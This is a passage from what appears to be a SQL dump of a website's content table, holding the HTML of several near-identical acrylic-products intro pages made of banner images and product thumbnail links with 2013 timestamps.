images/small/018.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcy\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/019.jpg\" alt=\"\" /></a></p>\r\n<br />\r\n<p> <img width=\"724\" height=\"2000\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/layout text/layout final.jpg\" alt=\"\" /></p>\r\n<p class=\"MsoNormal\"><span> </span> </p>\r\n<p> </p>','','','','','','','','','N','2013-04-03 20:00:59','2013-02-13 19:47:11',164),(163,'Layout1','1','ABOUT ULTIMATE ACRYLICS','ultimate9.php','9','9','9','<p><img width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" alt=\"\" /><img width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/large/010.jpg\" alt=\"\" /></p>\r\n<br />\r\n<p><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU1\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/001.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU2\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/002.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU3\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/005.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU4\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/004.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU5\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/006.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYw\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/007.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYx\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/008.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYy\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/009.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ0\"><img width=\"121\" height=\"85\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/003.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY0\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/011.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY1\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/012.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY2\"><img width=\"118\" height=\"86\" src=\"http://www.paulgrahamltd.com/EditorImages/image/barrett quad/small/quad visual.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY3\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/014.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY4\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/015.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY5\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/016.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcw\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/017.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcx\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/018.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcy\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/019.jpg\" alt=\"\" /></a></p>\r\n<br />\r\n<p> <img width=\"724\" height=\"2000\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/layout text/final layout with 18 colours/layout final.jpg\" alt=\"\" /></p>\r\n<p class=\"MsoNormal\"><span> </span> </p>\r\n<p> </p>','','','','','','','','','Y','2013-04-03 19:51:39','2013-02-13 19:47:36',125),(164,'Layout1','1','10','ultimate10.php','10','10','10','<p><img width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" alt=\"\" /><img width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/large/011.jpg\" alt=\"\" /></p>\r\n<br />\r\n<p><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU1\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/001.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU2\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/002.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU3\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/005.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU4\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/004.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU5\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/006.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYw\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/007.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYx\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/008.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYy\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/009.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYz\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/010.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ0\"><img width=\"121\" height=\"85\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/003.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY1\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/012.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY2\"><img width=\"118\" height=\"86\" src=\"http://www.paulgrahamltd.com/EditorImages/image/barrett quad/small/quad visual.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY3\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/014.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY4\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/015.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY5\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/016.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcw\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/017.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcx\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/018.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcy\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/019.jpg\" alt=\"\" /></a></p>\r\n<br />\r\n<p> <img width=\"724\" height=\"2000\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/layout text/layout final.jpg\" alt=\"\" /></p>\r\n<p class=\"MsoNormal\"><span> </span> </p>\r\n<p> </p>','','','','','','','','','N','2013-04-03 20:02:07','2013-02-13 19:47:59',165),(165,'Layout1','1','11','ultimate11.php','11','11','11','<p><img width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" alt=\"\" /><img width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/large/012.jpg\" alt=\"\" /></p>\r\n<br />\r\n<p><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU1\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/001.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU2\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/002.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU3\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/005.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU4\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/004.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU5\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/006.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYw\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/007.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYx\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/008.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYy\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/009.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYz\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/010.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY0\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/011.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ0\"><img width=\"121\" height=\"85\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/003.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY2\"><img width=\"118\" height=\"86\" src=\"http://www.paulgrahamltd.com/EditorImages/image/barrett quad/small/quad visual.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY3\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/014.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY4\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/015.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY5\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/016.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcw\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/017.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcx\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/018.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcy\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/019.jpg\" alt=\"\" /></a></p>\r\n<br />\r\n<p> <img width=\"724\" height=\"2000\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/layout text/layout final.jpg\" alt=\"\" /></p>\r\n<p class=\"MsoNormal\"><span> </span> </p>\r\n<p> </p>','','','','','','','','','N','2013-04-03 20:02:43','2013-02-13 19:48:44',166),(166,'Layout1','1','12','ultimate12.php','12','12','12','<p><img width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" alt=\"\" /><img width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/barrett quad/large/quad visual.jpg\" alt=\"\" /></p>\r\n<br />\r\n<p><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU1\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/001.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU2\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/002.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU3\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/005.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU4\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/004.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU5\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/006.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYw\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/007.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYx\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/008.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYy\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/009.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYz\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/010.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY0\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/011.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY1\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/012.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ0\"><img width=\"121\" height=\"85\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/003.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY3\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/014.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY4\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/015.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY5\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/016.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcw\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/017.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcx\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/018.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcy\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/019.jpg\" alt=\"\" /></a></p>\r\n<br />\r\n<p> <img width=\"724\" height=\"2000\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/layout text/layout final.jpg\" alt=\"\" /></p>\r\n<p class=\"MsoNormal\"><span> </span> </p>\r\n<p> </p>','','','','','','','','','N','2013-04-03 20:03:29','2013-02-13 19:49:11',167),(167,'Layout1','1','13','ultimate13.php','13','13','13','<p><img width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" alt=\"\" /><img width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/large/014.jpg\" alt=\"\" /></p>\r\n<br />\r\n<p><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU1\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/001.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU2\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/002.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU3\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/005.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU4\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/004.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU5\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/006.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYw\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/007.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYx\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/008.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYy\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/009.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYz\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/010.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY0\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/011.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY1\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/012.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY2\"><img width=\"118\" height=\"86\" src=\"http://www.paulgrahamltd.com/EditorImages/image/barrett quad/small/quad visual.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ0\"><img width=\"121\" height=\"85\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/003.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY4\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/015.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY5\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/016.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcw\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/017.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcx\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/018.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcy\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/019.jpg\" alt=\"\" /></a></p>\r\n<br />\r\n<p> <img width=\"724\" height=\"2000\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/layout text/layout final.jpg\" alt=\"\" /></p>\r\n<p class=\"MsoNormal\"><span> </span> </p>\r\n<p> </p>','','','','','','','','','N','2013-04-03 20:04:30','2013-02-13 19:49:39',168),(168,'Layout1','1','14','ultimate14.php','14','14','14','<p><img width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" alt=\"\" /><img width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/large/015.jpg\" alt=\"\" /></p>\r\n<br />\r\n<p><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU1\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/001.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU2\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/002.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU3\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/005.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU4\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/004.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU5\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/006.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYw\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/007.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYx\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/008.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYy\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/009.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTYz\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/010.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY0\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/011.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY1\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/012.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY2\"><img width=\"118\" height=\"86\" src=\"http://www.paulgrahamltd.com/EditorImages/image/barrett quad/small/quad visual.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY3\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/014.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTQ0\"><img width=\"121\" height=\"85\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/003.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTY5\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/016.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcw\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/017.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcx\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/018.jpg\" alt=\"\" /></a> <a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTcy\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/small/019.jpg\" alt=\"\" /></a></p>\r\n<br />\r\n<p> <img width=\"724\" height=\"2000\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/layout text/layout final.jpg\" alt=\"\" /></p>\r\n<p class=\"MsoNormal\"><span> </span> </p>\r\n<p> </p>','','','','','','','','','N','2013-04-03 20:05:09','2013-02-13 19:50:04',169),(169,'Layout1','1','15','ultimate15.php','15','15','15','<p><img width=\"726\" height=\"113\" src=\"http://www.paulgrahamltd.com/EditorImages/image/new banner/acrylic-banner.gif\" alt=\"\" /><img width=\"726\" height=\"509\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page images/large/016.jpg\" alt=\"\" /></p>\r\n<br />\r\n<p><a href=\"http://www.paulgrahamltd.com/product.php?cat_id=MQ==&prod_id=MTU1\"><img width=\"118\" height=\"83\" src=\"http://www.paulgrahamltd.com/EditorImages/image/intro page 